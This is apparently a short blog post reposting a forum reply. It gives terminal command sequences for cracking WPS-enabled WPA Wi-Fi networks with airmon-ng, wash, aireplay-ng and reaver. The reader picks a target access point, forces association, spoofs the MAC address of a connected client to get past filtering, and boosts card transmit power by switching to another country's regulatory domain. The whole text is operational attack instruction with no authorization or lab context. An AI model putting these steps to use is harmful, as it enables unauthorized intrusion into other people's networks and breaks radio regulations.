วันพฤหัสบดีที่ 17 ตุลาคม พ.ศ. 2556

Reaver Pro Fix Warning: Failed to associate

enable mon0 
airmon-ng start wlan0

Check for the wps enabled wpa wifi (this can also be done with wifite.py)
#wash -i mon0 -C

set your channel to the same AP in whiich you are interested 
#iwconfig mon0 channel <channel of AP eg. 11>

start aireplay 
#aireplay-ng mon0 -1 120 -a <MAC of AP> -e <AP name>

start reaver 
#reaver -i mon0 -A -b <MAC of AP> -v

Re: reaver "associate" problem
« Reply #9 on: September 28, 2012, 12:50:21 AM »

Some association fixes i've tried that have worked for me:

of course do yer scan
we'll call yer alfa wlan1

airmon-ng start wlan1
airodump-ng mon0
ya do yer scan find yer target etc
from terminal open split window
click on previous window then
ctrl+c to stop it or space bar to pause
back down to lower window
airodump-ng --bssid (target) -c (whatever channel) mon0
ctrl+shift+o split yer window
aireplay-ng - 1 10 -a (target) mon0
now she's associaten
doesn't mean things are gonna work
but worth a try
now open yet another window in terminal
reaver -i mon0 -A -b (target) -v
see if ya get wps comen in
if not another idea
when you ran airodump on the target before
if there is a station on that network
copy the mac down of that station
then shut down airmon
airmon-ng wlan1 stop
ifconfig wlan1 down
ifconfig wlan1 hw ether (station mac)
ifconfig wlan1 up
airmon-ng wlan1 start
then do yer aireplay
then run reaver again with the -A in there
so reaver doesn't associate
you can also try boosting the alfa:
before monitor mode:
Boost Alfa:
before monitor mode
iw reg set BO
iwconfig wlan1 txpower 30

might want to try txpower 25 first
check make sure card isn't too warm
after a bit

